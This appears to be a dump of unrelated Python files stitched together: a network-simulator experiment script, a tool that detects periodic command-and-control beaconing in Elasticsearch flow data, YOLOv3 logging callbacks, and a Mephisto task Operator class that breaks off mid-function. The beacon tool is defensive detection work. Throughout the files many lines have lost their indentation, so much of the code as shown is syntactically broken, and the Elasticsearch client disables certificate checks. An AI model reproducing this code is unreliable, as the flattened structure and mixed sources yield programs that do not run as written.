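# `python generate_baseline_stats.py baseline.pickle`.
#
#     import pickle
#     with open('baseline.pickle', 'rb') as fin:
#         baseline = pickle.load(fin)
#     print(baseline['time'], baseline['sim_dt'])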
|
run_experiments_verify.py
|
#!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
conf_str_incastN = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 10485760
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: {4}
flow_trace: ./CDF_{1}.txt
cut_through: 0
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
num_pctl: 10
big_switch: 1
num_agg_switches: 16
num_core_switches: 9
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 1
disable_pkt_logging: 0
disable_cwnd_logging: 0
only_sw_queue: 0
mtu: 5120
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
priority_downgrade: 0
hardcoded_targets: 15,25
high_prio_lat_target: 10
target_expiration: 50000
downgrade_window: 20
expiration_count: 250
rtt_expiration: 0
use_random_jitter: 1
random_flow_start: 0
enable_initial_shift: 1
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['0,100', '10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10', '100,0']
qos_ratio = ['66.67,33.33', '69,21','82,18', '83.33,16.67', '75,25']
#qos_ratio = ['81,19', '83,17', '77,23', '90,10', '95,5', '100,0']
#qos_ratio = ['99,1']
#qos_ratio = ['50,50']
#qos_ratio = ['70,20,10']
#qos_ratio = ['10,20,70', '20,20,60', '30,20,50', '40,20,40', '50,20,30', '60,20,20', '70,20,10']
runs = ['incast']
#burst_size = [64,256]
burst_size = [10000]
#burst_size = [1,2,4,8,16,32,64,128,256,512]
traffic_size = [1]
## create the "./exp_config" and "./result" directories by yourself :(
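# A minimal sketch (not in the original script) of creating those directories up front
# instead of by hand; the names match the paths used below.
#
#     for d in ('./exp_config', './result'):
#         if not os.path.exists(d):
#             os.makedirs(d)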
binary = 'coresim/simulator'
template = binary + ' 1 ./exp_config/conf_{0}{1}_{2}_D{3}_B{4}.txt > ./result/result_{0}{1}_{2}_D{3}_B{4}.txt'
cdf_temp = './CDF_{}.txt'
#cdf_RPC = ['uniform_4K', 'uniform_32K']
cdf_RPC = ['uniform_4K']
#cdf_RPC = ['write_req']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
    return int(out.decode().split()[0])
def run_exp(params, semaphore):
    semaphore.acquire()
    print(template.format(*params))
    subprocess.call(template.format(*params), shell=True)
    semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
for N in traffic_size: # incast size or all-to-all size
num_flow = 1000000
# generate conf file
if r == 'incast':
conf_str = conf_str_incastN.format(num_flow, cdf, ratio, burst, N + 1)
else:
assert False, r
# Note modify the config dir name
confFile = "./exp_config/conf_{0}{1}_{2}_D{3}_B{4}.txt".format(r, N, cdf, ratio.replace(',', '_'), burst)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, N, cdf, ratio.replace(',', '_'), burst), semaphore)))
print('\n')
[t.start() for t in threads]
[t.join() for t in threads]
print('finished', len(threads), 'experiments')
|
command_control.py
|
# coding: utf-8
import sys
from flare.tools.utils import bcolors
from flare.base.config import flareConfig
try:
import pandas as pd
except ImportError:
    print("Please make sure you have pandas installed. pip install -r requirements.txt or pip install pandas")
sys.exit(0)
try:
from elasticsearch import Elasticsearch, helpers
except ImportError:
    print("Please make sure you have the elasticsearch module installed. pip install -r requirements.txt or pip install elasticsearch")
sys.exit(0)
from multiprocessing import Process, JoinableQueue, Lock, Manager
from flare.tools.iputils import private_check, multicast_check, reserved_check
from flare.tools.whoisip import WhoisLookup
import time
import warnings
import os
import datetime
import json
warnings.filterwarnings('ignore')
config_default = os.path.join(os.path.dirname(__file__), '..', '..', 'configs/elasticsearch.ini')
class elasticBeacon(object):
"""
    Elastic Beacon is designed to identify periodic communication between
    network communicators. Future updates will allow for dynamic fields to be passed in.
    If you do not allow your Elasticsearch server to communicate externally, you can set up an
    ssh tunnel by using ssh -NfL 9200:localhost:9200 username@yourserver
    Otherwise, you'll need to adjust es_host to the IP address that is exposed to Elasticsearch.
"""
def __init__(self,
config_in=None,
min_occur=10,
min_percent=5,
window=2,
threads=8,
period=24,
min_interval=2,
es_host='localhost',
es_port=9200,
es_timeout=480,
es_index='logstash-flow-*',
kibana_version='4',
verbose=True,
debug=False):
"""
:param min_occur: Minimum number of triads to be considered beaconing
:param min_percent: Minimum percentage of all connection attempts that
must fall within the window to be considered beaconing
:param window: Size of window in seconds in which we group connections to determine percentage, using a
large window size can give inaccurate interval times, multiple windows contain all interesting packets,
so the first window to match is the interval
        :param threads: Number of worker processes to use
        :param period: Number of hours to locate beacons for
        :param min_interval: Minimum interval between events to consider for beaconing behavior
        :param es_host: IP address of the elasticsearch host (default is localhost)
        :param es_port: Port of the elasticsearch host (default is 9200)
        :param es_timeout: Elasticsearch client timeout in seconds (default is 480)
        :param es_index: Index pattern to query (default is logstash-flow-*)
        :param kibana_version: 4 or 5 (query will depend on version)
        :param verbose: Print status messages while running
        :param debug: Print debug messages while running
"""
#self.config_in = config_in
if config_in is not None:
try:
self.config = flareConfig(config_in)
self.es_host = self.config.get('beacon', 'es_host')
self.es_port = int(self.config.get('beacon', 'es_port'))
self.es_index = self.config.get('beacon', 'es_index')
self.MIN_OCCURRENCES = int(self.config.get('beacon','min_occur'))
self.MIN_PERCENT = int(self.config.get('beacon','min_percent'))
self.WINDOW = int(self.config.get('beacon','window'))
self.NUM_PROCESSES = int(self.config.get('beacon','threads'))
self.period = int(self.config.get('beacon','period'))
self.min_interval = int(self.config.get('beacon', 'min_interval'))
self.es_timeout = int(self.config.get('beacon','es_timeout'))
self.kibana_version = self.config.get('beacon','kibana_version')
self.beacon_src_ip = self.config.get('beacon','field_source_ip')
self.beacon_dest_ip = self.config.get('beacon', 'field_destination_ip')
self.beacon_destination_port = self.config.get('beacon', 'field_destination_port')
self.beacon_timestamp = self.config.get('beacon', 'field_timestamp')
self.beacon_flow_bytes_toserver = self.config.get('beacon', 'field_flow_bytes_toserver')
self.beacon_flow_id = self.config.get('beacon', 'field_flow_id')
self.beacon_event_type = self.config.get('beacon','event_type')
self.verbose = self.config.config.getboolean('beacon', 'verbose')
self.auth_user = self.config.config.get('beacon','username')
self.auth_password = self.config.config.get('beacon', 'password')
self.suricata_defaults = self.config.config.getboolean('beacon','suricata_defaults')
try:
self.debug = self.config.config.getboolean('beacon', 'debug')
except:
pass
except Exception as e:
print(('{red}[FAIL]{endc} Could not properly load your config!\nReason: {e}'.format(red=bcolors.FAIL, endc=bcolors.ENDC, e=e)))
sys.exit(0)
else:
self.es_host = es_host
self.es_port = es_port
self.es_index = es_index
self.MIN_OCCURRENCES = min_occur
self.MIN_PERCENT = min_percent
self.WINDOW = window
self.NUM_PROCESSES = threads
self.period = period
self.min_interval = min_interval
self.kibana_version = kibana_version
self.es_timeout = es_timeout
self.beacon_src_ip = 'src_ip'
self.beacon_dest_ip = 'dest_ip'
self.beacon_destination_port = 'dest_port'
self.beacon_timestamp = '@timestamp'
self.beacon_flow_bytes_toserver = 'bytes_toserver'
self.beacon_flow_id = 'flow_id'
self.beacon_event_type = 'flow'
self.verbose = verbose
self.suricata_defaults = False
self.ver = {'4': {'filtered': 'query'}, '5': {'bool': 'must'}}
self.filt = list(self.ver[self.kibana_version].keys())[0]
self.query = list(self.ver[self.kibana_version].values())[0]
self.debug = debug
self.whois = WhoisLookup()
self.info = '{info}[INFO]{endc}'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC)
self.success = '{green}[SUCCESS]{endc}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC)
self.fields = [self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port, 'bytes_toserver', 'dest_degree', 'occurrences', 'percent', 'interval']
        try:
            self.auth = (self.auth_user, self.auth_password)
        except AttributeError:
            self.auth = None
try:
self.vprint('{info}[INFO]{endc} Attempting to connect to elasticsearch...'.format(info=bcolors.OKBLUE,
endc=bcolors.ENDC))
            if self.auth is None:
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, verify_certs=False)
else:
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, http_auth=(self.auth_user, self.auth_password), verify_certs=False)
self.vprint('{green}[SUCCESS]{endc} Connected to elasticsearch on {host}:{port}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC, host=self.es_host, port=str(self.es_port)))
except Exception as e:
self.vprint(e)
raise Exception(
"Could not connect to ElasticSearch -- Please verify your settings are correct and try again.")
self.q_job = JoinableQueue()
self.l_df = Lock()
self.l_list = Lock()
self.high_freq = None
self.flow_data = self.run_query()
def vprint(self, msg):
if self.verbose:
print(msg)
def dprint(self, msg):
if self.debug:
print(("[DEBUG] " + str(msg)))
def hour_query(self, h, *fields):
"""
:param h: Number of hours to look for beaconing (recommend 24 if computer can support it)
:param fields: Retrieve only these fields -- example "src_ip", "dest_ip", "src_port", "dest_port"
:return:
"""
# Timestamp in ES is in milliseconds
NOW = int(time.time() * 1000)
SECONDS = 1000
MINUTES = 60 * SECONDS
HOURS = 60 * MINUTES
lte = NOW
gte = int(NOW - h * HOURS)
if self.es_index:
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": "*",
"analyze_wildcard": 'true'
}
},
"filter": [{
"bool": {
"must": [
{
"range": {
self.beacon_timestamp: {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
},
{"term": {"event_type": self.beacon_event_type}}
]
}
}
}
else:
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": "*",
"analyze_wildcard": 'true'
}
},
"filter": {
"bool": {
"must": [
{
"range": {
"timestamp": {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
}
}
}
}
if fields:
query["_source"] = list(fields)
self.dprint(query)
return query
def percent_grouping(self, d, total):
        interval = 0
        # Finding the key with the largest value (interval with most events)
        mx_key = int(max(d, key=d.get))
mx_percent = 0.0
for i in range(mx_key - self.WINDOW, mx_key + 1):
current = 0
# Finding center of current window
curr_interval = i + int(self.WINDOW / 2)
for j in range(i, i + self.WINDOW):
if j in d:
current += d[j]
percent = float(current) / total * 100
if percent > mx_percent:
mx_percent = percent
interval = curr_interval
return interval, mx_percent
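    # Worked example (illustrative, not part of the class): with self.WINDOW == 2 and
    # interval counts d = {10: 3, 11: 5, 12: 2} (total = 10), the densest 2-second
    # window covers the 10-11 second deltas with 8 of 10 events, so
    #
    #     interval, pct = self.percent_grouping({10: 3, 11: 5, 12: 2}, 10)
    #     # -> interval == 11, pct == 80.0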
def run_query(self):
self.vprint("{info} Gathering flow data... this may take a while...".format(info=self.info))
FLOW_BYTES = self.beacon_flow_bytes_toserver
if self.suricata_defaults:
FLOW_BYTES = 'flow.' + FLOW_BYTES
query = self.hour_query(self.period, self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port,
self.beacon_timestamp, FLOW_BYTES, self.beacon_flow_id)
self.dprint(query)
resp = helpers.scan(query=query, client=self.es, scroll="90m", index=self.es_index, timeout="10m")
df = pd.DataFrame([rec['_source'] for rec in resp])
if len(df) == 0:
raise Exception("Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")
self.dprint(df)
df['dest_port'] = df[self.beacon_destination_port].fillna(0).astype(int)
if 'flow' in df.columns:
df[self.beacon_flow_bytes_toserver] = df['flow'].apply(lambda x: x.get(self.beacon_flow_bytes_toserver))
df['triad_id'] = (df[self.beacon_src_ip] + df[self.beacon_dest_ip] + df[self.beacon_destination_port].astype(str)).apply(hash)
df['triad_freq'] = df.groupby('triad_id')['triad_id'].transform('count').fillna(0).astype(int)
self.high_freq = list(df[df.triad_freq > self.MIN_OCCURRENCES].groupby('triad_id').groups.keys())
return df
def find_beacon(self, q_job, beacon_list):
while not q_job.empty():
triad_id = q_job.get()
self.l_df.acquire()
work = self.flow_data[self.flow_data.triad_id == triad_id]
self.l_df.release()
work[self.beacon_timestamp] = pd.to_datetime(work[self.beacon_timestamp])
work[self.beacon_timestamp] = (work[self.beacon_timestamp].astype(int) / 1000000000).astype(int)
work = work.sort_values([self.beacon_timestamp])
work['delta'] = (work[self.beacon_timestamp] - work[self.beacon_timestamp].shift()).fillna(0)
work = work[1:]
d = dict(work.delta.value_counts())
for key in list(d.keys()):
if key < self.min_interval:
del d[key]
# Finding the total number of events
total = sum(d.values())
if d and total > self.MIN_OCCURRENCES:
window, percent = self.percent_grouping(d, total)
if percent > self.MIN_PERCENT and total > self.MIN_OCCURRENCES:
PERCENT = str(int(percent))
WINDOW = str(window)
SRC_IP = work[self.beacon_src_ip].unique()[0]
DEST_IP = work[self.beacon_dest_ip].unique()[0]
DEST_PORT = str(int(work[self.beacon_destination_port].unique()[0]))
BYTES_TOSERVER = work[self.beacon_flow_bytes_toserver].sum()
SRC_DEGREE = len(work[self.beacon_dest_ip].unique())
OCCURRENCES = total
self.l_list.acquire()
beacon_list.append([SRC_IP, DEST_IP, DEST_PORT, BYTES_TOSERVER, SRC_DEGREE, OCCURRENCES, PERCENT, WINDOW])
self.l_list.release()
q_job.task_done()
def find_beacons(self, group=True, focus_outbound=False, whois=True, csv_out=None, html_out=None, json_out=None):
for triad_id in self.high_freq:
self.q_job.put(triad_id)
mgr = Manager()
beacon_list = mgr.list()
processes = [Process(target=self.find_beacon, args=(self.q_job, beacon_list,)) for thread in
range(self.NUM_PROCESSES)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
beacon_list = list(beacon_list)
beacon_df = pd.DataFrame(beacon_list,
columns=self.fields).dropna()
beacon_df.interval = beacon_df.interval.astype(int)
beacon_df['dest_degree'] = beacon_df.groupby(self.beacon_dest_ip)[self.beacon_dest_ip].transform('count').fillna(0).astype(int)
self.vprint('{info} Calculating destination degree.'.format(info=self.info))
if whois:
self.vprint('{info} Enriching IP addresses with whois information'.format(info=self.info))
beacon_df['src_whois'] = beacon_df[self.beacon_src_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
beacon_df['dest_whois'] = beacon_df[self.beacon_dest_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
if focus_outbound:
self.vprint('{info} Applying outbound focus - filtering multicast, reserved, and private IP space'.format(info=self.info))
beacon_df = beacon_df[(beacon_df[self.beacon_src_ip].apply(private_check)) &
(~beacon_df[self.beacon_dest_ip].apply(multicast_check)) &
(~beacon_df[self.beacon_dest_ip].apply(reserved_check)) &
(~beacon_df[self.beacon_dest_ip].apply(private_check))]
if group:
self.vprint('{info} Grouping by destination group IP'.format(info=self.info))
if whois:
self.fields.insert(self.fields.index(self.beacon_dest_ip), 'dest_whois')
beacon_df = pd.DataFrame(beacon_df.groupby(self.fields).size())
beacon_df.drop(0, axis=1, inplace=True)
if csv_out:
self.vprint('{success} Writing csv to {csv_name}'.format(csv_name=csv_out, success=self.success))
beacon_df.to_csv(csv_out, index=False)
if html_out:
self.vprint('{success} Writing html file to {html_out}'.format(html_out=html_out, success=self.success))
beacon_df.to_html(html_out)
if json_out:
self.vprint('{success} Writing json file to {json_out}'.format(json_out=json_out, success=self.success))
now = datetime.datetime.now().isoformat()
beacon_df['timestamp'] = now
beacon_df['period'] = self.period
beacon_df['event_type'] = "beaconing"
beacons = beacon_df.to_dict(orient="records")
with open(json_out, 'a') as out_file:
for beacon in beacons:
out_file.write(json.dumps(beacon) + '\n')
return beacon_df
|
__init__.py
|
# YOLOv3 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
wandb_login_success = wandb.login(timeout=30)
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers():
# Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
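# Note: callbacks such as on_fit_epoch_end below zip incoming values against self.keys,
# so the order of the vals passed in by the trainer must match this list exactly.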
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv3 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch, results):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *(f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R'))]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Log the final model checkpoint as a W&B artifact. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
operator.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import shutil
import json
import os
import tempfile
import time
import threading
import shlex
import traceback
import signal
from argparse import ArgumentParser
from mephisto.operations.supervisor import Supervisor, Job
from typing import Dict, Optional, List, Any, Tuple, NamedTuple, Type, TYPE_CHECKING
from mephisto.data_model.task_config import TaskConfig
from mephisto.data_model.task_run import TaskRun
from mephisto.data_model.requester import Requester
from mephisto.abstractions.blueprint import OnboardingRequired, SharedTaskState
from mephisto.abstractions.database import MephistoDB, EntryDoesNotExistException
from mephisto.data_model.qualification import make_qualification_dict, QUAL_NOT_EXIST
from mephisto.operations.task_launcher import TaskLauncher
from mephisto.operations.registry import (
get_blueprint_from_type,
get_crowd_provider_from_type,
get_architect_from_type,
)
from mephisto.operations.utils import get_mock_requester
from mephisto.operations.logger_core import get_logger, set_mephisto_log_level
from omegaconf import DictConfig, OmegaConf
logger = get_logger(name=__name__)
if TYPE_CHECKING:
from mephisto.data_model.agent import Agent
from mephisto.abstractions.blueprint import Blueprint, TaskRunner
from mephisto.abstractions.crowd_provider import CrowdProvider
from mephisto.abstractions.architect import Architect
from argparse import Namespace
RUN_STATUS_POLL_TIME = 10
class TrackedRun(NamedTuple):
task_run: TaskRun
architect: "Architect"
task_runner: "TaskRunner"
task_launcher: TaskLauncher
job: Job
class Operator:
"""
Acting as the controller behind the curtain, the Operator class
is responsible for managing the knobs, switches, and dials
of the rest of the Mephisto architecture.
Most convenience scripts for using Mephisto will use an Operator
to get the job done, though this class itself is also a
good model to use to understand how the underlying
architecture works in order to build custom jobs or workflows.
"""
def __init__(self, db: "MephistoDB"):
self.db = db
self.supervisor = Supervisor(db)
self._task_runs_tracked: Dict[str, TrackedRun] = {}
self.is_shutdown = False
self._run_tracker_thread = threading.Thread(
target=self._track_and_kill_runs, name="Operator-tracking-thread"
)
self._run_tracker_thread.start()
@staticmethod
def _get_baseline_argparser() -> ArgumentParser:
"""Return a parser for the baseline requirements to launch a job"""
parser = ArgumentParser()
parser.add_argument(
"--blueprint-type",
dest="blueprint_type",
help="Name of the blueprint to launch",
required=True,
)
parser.add_argument(
"--architect-type",
dest="architect_type",
help="Name of the architect to launch with",
required=True,
)
parser.add_argument(
"--requester-name",
dest="requester_name",
help="Identifier for the requester to launch as",
required=True,
)
return parser
def get_running_task_runs(self):
"""Return the currently running task runs and their handlers"""
return self._task_runs_tracked.copy()
def parse_and_launch_run(
self,
arg_list: Optional[List[str]] = None,
extra_args: Optional[Dict[str, Any]] = None,
) -> Optional[str]:
"""
Wrapper around parse and launch run that prints errors on failure, rather
than throwing. Generally for use in scripts.
"""
raise Exception(
"Operator.parse_and_launch_run has been deprecated in favor "
"of using Hydra for argument configuration. See the docs at "
"https://github.com/facebookresearch/Mephisto/blob/master/docs/hydra_migration.md "
"in order to upgrade."
)
def validate_and_run_config_or_die(
self, run_config: DictConfig, shared_state: Optional[SharedTaskState] = None
) -> str:
"""
Parse the given arguments and launch a job.
"""
set_mephisto_log_level(level=run_config.get("log_level", "info"))
if shared_state is None:
shared_state = SharedTaskState()
# First try to find the requester:
requester_name = run_config.provider.requester_name
requesters = self.db.find_requesters(requester_name=requester_name)
if len(requesters) == 0:
if run_config.provider.requester_name == "MOCK_REQUESTER":
requesters = [get_mock_requester(self.db)]
else:
raise EntryDoesNotExistException(
f"No requester found with name {requester_name}"
)
requester = requesters[0]
requester_id = requester.db_id
provider_type = requester.provider_type
assert provider_type == run_config.provider._provider_type, (
f"Found requester for name {requester_name} is not "
f"of the specified type {run_config.provider._provider_type}, "
f"but is instead {provider_type}."
)
# Next get the abstraction classes, and run validation
# before anything is actually created in the database
blueprint_type = run_config.blueprint._blueprint_type
architect_type = run_config.architect._architect_type
BlueprintClass = get_blueprint_from_type(blueprint_type)
ArchitectClass = get_architect_from_type(architect_type)
CrowdProviderClass = get_crowd_provider_from_type(provider_type)
BlueprintClass.assert_task_args(run_config, shared_state)
ArchitectClass.assert_task_args(run_config, shared_state)
CrowdProviderClass.assert_task_args(run_config, shared_state)
# Find an existing task or create a new one
task_name = run_config.task.get("task_name", None)
if task_name is None:
task_name = blueprint_type
logger.warning(
f"Task is using the default blueprint name {task_name} as a name, "
"as no task_name is provided"
)
tasks = self.db.find_tasks(task_name=task_name)
task_id = None
if len(tasks) == 0:
task_id = self.db.new_task(task_name, blueprint_type)
else:
task_id = tasks[0].db_id
logger.info(f"Creating a task run under task name: {task_name}")
# Create a new task run
new_run_id = self.db.new_task_run(
task_id,
requester_id,
json.dumps(OmegaConf.to_yaml(run_config, resolve=True)),
provider_type,
blueprint_type,
requester.is_sandbox(),
)
task_run = TaskRun(self.db, new_run_id)
try:
# Register the blueprint with args to the task run,
# ensure cached
blueprint = task_run.get_blueprint(
args=run_config, shared_state=shared_state
)
# If anything fails after here, we have to cleanup the architect
build_dir = os.path.join(task_run.get_run_dir(), "build")
os.makedirs(build_dir, exist_ok=True)
architect = ArchitectClass(
self.db, run_config, shared_state, task_run, build_dir
)
# Setup and deploy the server
built_dir = architect.prepare()
task_url = architect.deploy()
# TODO(#102) maybe the cleanup (destruction of the server configuration?) should only
# happen after everything has already been reviewed, this way it's possible to
# retrieve the exact build directory to review a task for real
architect.cleanup()
# Create the backend runner
task_runner = BlueprintClass.TaskRunnerClass(
task_run, run_config, shared_state
)
# Small hack for auto appending block qualification
existing_qualifications = shared_state.qualifications
if run_config.blueprint.get("block_qualification", None) is not None:
existing_qualifications.append(
make_qualification_dict(
run_config.blueprint.block_qualification, QUAL_NOT_EXIST, None
)
)
if run_config.blueprint.get("onboarding_qualification", None) is not None:
existing_qualifications.append(
make_qualification_dict(
OnboardingRequired.get_failed_qual(
run_config.blueprint.onboarding_qualification
),
QUAL_NOT_EXIST,
None,
)
)
shared_state.qualifications = existing_qualifications
# Register the task with the provider
provider = CrowdProviderClass(self.db)
provider.setup_resources_for_task_run(
task_run, run_config, shared_state, task_url
)
initialization_data_iterable = blueprint.get_initialization_data()
# Link the job together
job = self.supervisor.register_job(
architect, task_runner, provider, existing_qualifications
)
if self.supervisor.sending_thread is None:
self.supervisor.launch_sending_thread()
except (KeyboardInterrupt, Exception) as e:
logger.error(
"Encountered error while launching run, shutting down", exc_info=True
)
try:
architect.shutdown()
except (KeyboardInterrupt, Exception) as architect_exception:
logger.exception(
f"Could not shut down architect: {architect_exception}",
exc_info=True,
)
raise e
launcher = TaskLauncher(
self.db,
task_run,
initialization_data_iterable,
max_num_concurrent_units=run_config.task.max_num_concurrent_units,
)
launcher.create_assignments()
launcher.launch_units(task_url)
self._task_runs_tracked[task_run.db_id] = TrackedRun(
task_run=task_run,
task_launcher=launcher,
task_runner=task_runner,
architect=architect,
job=job,
)
task_run.update_completion_progress(status=False)
return task_run.db_id
def _track_and_kill_runs(self):
"""
Background thread that shuts down servers when a task
is fully done.
"""
while not self.is_shutdown:
runs_to_check = list(self._task_runs_tracked.values())
for tracked_run in runs_to_check:
task_run = tracked_run.task_run
if tracked_run.task_launcher.finished_generators is False:
# If the run can still generate assignments, it's
# definitely not done
continue
task_run.update_completion_progress(
task_launcher=tracked_run.task_launcher
)
if not task_run.get_is_completed():
continue
else:
self.supervisor.shutdown_job(tracked_run.job)
tracked_run.architect.shutdown()
tracked_run.task_launcher.shutdown()
del self._task_runs_tracked[task_run.db_id]
time.sleep(RUN_STATUS_POLL_TIME)
def force_shutdown(self, timeout=5):
"""
Force a best-effort shutdown of everything, letting no individual
shutdown step suspend for more than the timeout before moving on.
Skips waiting for in-flight assignments to rush the shutdown.
** Should only be used in sandbox or test environments. **
"""
self.is_shutdown = True
def end_launchers_and_expire_units():
for tracked_run in self._task_runs_tracked.values():
tracked_run.task_launcher.shutdown()
tracked_run.task_launcher.expire_units()
def end_architects():
for tracked_run in self._task_runs_tracked.values():
